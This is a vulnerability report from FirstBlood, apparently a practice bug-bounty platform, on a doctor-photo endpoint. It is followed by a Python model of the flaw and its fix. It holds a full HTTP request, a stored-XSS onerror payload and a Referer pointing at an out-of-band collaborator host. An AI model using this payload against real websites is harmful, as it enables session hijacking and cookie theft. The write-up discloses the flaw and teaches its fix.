FirstBlood-#1453 — Change Doctor's image
This issue was discovered on FirstBlood v3
On 2022-12-10, ayush1098 Level 8 reported:
Hello Team,
Summary:
We can upload the image via the /drpanel/drapi/edit-dr.php endpoint, and it will accept relative URLs to change the image.
Steps To Reproduce:
- Send this request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 84ceebdff6c3-ayush1098.a.firstbloodhackers.com
Cookie: drps=e7ba713ce83c4caf4b907254d
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] os6cfn5
Accept: */*, text/os6cfn5
Origin: https://os6cfn5.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://waahcfda8s29igyjhf28xzg4ovuyszgo.oastify.com/ref
Accept-Encoding: gzip, deflate, os6cfn5
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/doctor_1.png
Exploiting this for stored XSS:
We can exploit this for XSS via the file name. This XSS only works for drId=1 and executes on meet_drs.php.
The payload is /'"+onerror="alert(document.domain)
The magicbox will pop up on the /meet_drs.php endpoint.
Impact:
We can change the image even though there are restrictions in the UI, and with the XSS we can do cookie stealing, session hijacking, etc.
Thanks & Regards
Ayush Singh
P2 High
Endpoint: /drpanel/drapi/edit-dr.php
Parameter: photoUrl
Payload: NA
FirstBlood ID: 64
Vulnerability Type: Stored XSS
There is a stored XSS vulnerability on meet_drs.php via the doctor's photo URL.
FirstBlood ID: 61
Vulnerability Type: Application/Business Logic
The UI states that doctor photos can NOT be modified, but it is actually possible to modify them.
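The two findings above share one root cause: edit-dr.php stores whatever photoUrl it is given, and meet_drs.php drops that stored value into an img src attribute without encoding it, so a quote in the value ends the attribute and the rest becomes an onerror handler. The following is an added example, not FirstBlood's code: the real templates are not on this page, so the double-quoted src context, the record fields and the handler names are assumptions. It reproduces the reporter's form body, shows the attribute breakout with a real HTML tokenizer, and then shows the two-part fix: ignore photoUrl server-side (the logic bug) and attribute-encode the stored value when rendering (the XSS), with an allowlist check in case the photo ever becomes editable.

```python
"""Model of the photoUrl flaw in FirstBlood-#1453 (added example, not the app's code).

Assumptions: the record is a dict, edit-dr.php copies form fields into it, and
meet_drs.php renders <img src="..."> with a double-quoted attribute.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed request body with the reporter's payload, form-urlencoded ('+' is a space).
CONSTRUCTED_BODY = (
    "drid=1&name=Jon&bio=sxs&bookable=0"
    "&photoUrl=/'\"+onerror=\"alert(document.domain)"
)

# Allowlist for a photo path: one path segment under the web root with an image
# extension; no query, fragment, quotes or traversal can match.
PHOTO_URL_RE = re.compile(r"^/[A-Za-z0-9_\-]+\.(?:png|jpe?g)$")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def edit_dr_vulnerable(form, record):
    """Assumed behaviour of the vulnerable endpoint: every field is stored verbatim,
    including photoUrl, although the UI says the photo cannot be changed."""
    for key in ("name", "bio", "bookable", "photoUrl"):
        if key in form:
            record[key] = form[key]
    return record


def edit_dr_hardened(form, record):
    """Fix for the logic bug: the photo is not user-editable, so photoUrl is ignored."""
    for key in ("name", "bio", "bookable"):
        if key in form:
            record[key] = form[key]
    return record


def validate_photo_url(value):
    """Allowlist check to apply if photos ever become editable; None means rejected."""
    return value if PHOTO_URL_RE.fullmatch(value) else None


def render_vulnerable(record):
    """Assumed meet_drs.php rendering: the stored value lands in a double-quoted
    attribute with no encoding, so a quote inside it closes the attribute."""
    return '<img src="%s">' % record["photoUrl"]


def render_hardened(record):
    """Attribute-encode the value (quotes become &quot; / &#x27;) so it can never
    leave the src attribute, even if hostile data is already stored."""
    return '<img src="%s">' % escape(record["photoUrl"], quote=True)


class ImgAttrs(HTMLParser):
    """Collect the attributes of every <img> the way a browser tokenizer would."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs.extend(attrs)


def img_attributes(markup):
    """Return the (name, value) attributes parsed from the <img> tags in markup."""
    p = ImgAttrs()
    p.feed(markup)
    p.close()
    return p.attrs


def has_event_handler(markup):
    """True if any parsed <img> attribute is an on* handler, i.e. the payload escaped src."""
    return any(name.startswith("on") for name, _ in img_attributes(markup))


if __name__ == "__main__":
    form = parse_form(CONSTRUCTED_BODY)
    doctor = {"name": "Doctor 1", "bio": "", "bookable": "1", "photoUrl": "/doctor_1.png"}

    vuln = render_vulnerable(edit_dr_vulnerable(form, dict(doctor)))
    print(vuln, has_event_handler(vuln))      # onerror is parsed as a real attribute

    fixed = render_hardened(edit_dr_hardened(form, dict(doctor)))
    print(fixed, has_event_handler(fixed))    # photo untouched, nothing leaves src

    print(validate_photo_url("/doctor_1.png"), validate_photo_url(form["photoUrl"]))
```

The check uses html.parser rather than a substring match so that the assertion is about what a tokenizer actually produces: in the vulnerable rendering onerror is a separate attribute, while after encoding the whole payload, quotes included, comes back as the single src value. Encoding at render time is what stops the XSS for records that already hold a hostile photoUrl; ignoring the field at edit time is what closes the logic bug.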